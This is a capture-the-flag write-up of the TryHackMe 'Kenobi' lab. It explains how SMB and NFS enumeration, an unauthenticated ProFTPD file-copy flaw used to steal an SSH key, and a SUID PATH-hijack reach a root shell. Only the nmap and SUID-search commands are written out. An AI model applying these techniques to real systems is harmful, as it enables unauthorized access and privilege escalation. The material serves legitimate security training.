Kenobi

https://tryhackme.com/room/kenobi

Hello! In this writeup we're going through this vulnerable Star Wars themed Linux machine.

Reconnaissance

First thing first, let's run our nmap scan:

> nmap -sS -p- -T4 -A 10.10.185.199

Let's look at the output of our scan:

Looking at results we see ports 139 and 445 are opened. Every time you see these ports opened, you brain should blink. Many times we can find known vulnerabilities in the SMB protocol.

In this case it's Samba that runs the SMB protocol.

Samba is the standard Windows interoperability suite of programs for Linux and Unix. It allows end users to access and use files, printers and other commonly shared resources on a companies intranet or internet. Its often referred to as a network file system.

Samba is based on the common client/server protocol of Server Message Block (SMB). SMB is developed only for Windows, without Samba, other computer platforms would be isolated from Windows machines, even if they were part of the same network.

Let's go the distance. We run the Nmap Script Engine (NSE) in order to enumerate the SMB protocol:

You can enumerate SMB protocol in different ways. For example there is also a metasploit script which allows that.

Interesting... We can access to the c:\home\kenobi\share as anonymous user. Now let's download the content of this share:

By reading the log.txt file we discover that a pair of public/private key is created. Maybe we can try to move the keys in the shares which we have access. But as anonymous we can just read the content and not edit it (as you can see in the log file). So we must find an alternative way to move files on the server.

We know that port 111 is opened. That is port is used to access to the network file system. By running the showmount command in order to know the mount:

Okay, we can mount this directory to access to network's files. We will use this in a second.

Now we should find a way to move the ssh key to the var directory. FTP is running and it's used by PROftpd. Looking on the internet we see that the 1.3.5 version has a vulnerability. In fact you can run SITE CPFR and SITE CPTO commands to move files on the server without being logged. Seems like we have found a way to move the ssh key, nice!

Let's mount the /var directory to our system:

The 'nfs' directory should be already created

Exploitation

Now let's abuse the proftpd vulnerability to move the ssh key:

We access to the machine through FTP protocol

We expect to find the id_rsa file into our nfs folder. Let's check:

BOOM! Now we can use this key to access through ssh as kenobi without knowing the password!

Privilege Escalation

So now we are logged as kenobi. Let's see if there are SUID binaries by entering the following command:

> find / -perm -u=s -type f 2>/dev/null

We can run this command on our system and compare the results in order to find something interesting

We are looking for something interesting so let's run strings on this binary:

Now we know that this binary runs the curl command as a root because of the SUID bit is on. The curl command is executed without specifying the absolute path, so before running the command it will check in the PATH the binary to be executed. NICE! We can create a malicious file called "curl" and add it to the PATH, so it will be executed by the usr/bin/menu binary.

Let's create the curl file, which will pop a bash shell:

We should add the /home/kenobi directory to the path:

Perfect! Now we expect that when we run /usr/bin/menu, the malicious curl binary will be executed as root, so a new shell will be popped. Let's see:

Congratulations! We escalated our shell to root thanks to path variable manipulation! Now we just move to the root directory in order to grap the root flag.

Thanks for reading my writeup! See you!

Resources

LogoTryHackMe | Cyber Security TrainingTryHackMe

https://www.youtube.com/watch?v=60_g_hBVLbg

PreviousBlueNextVulnversity

Last updated

Was this helpful?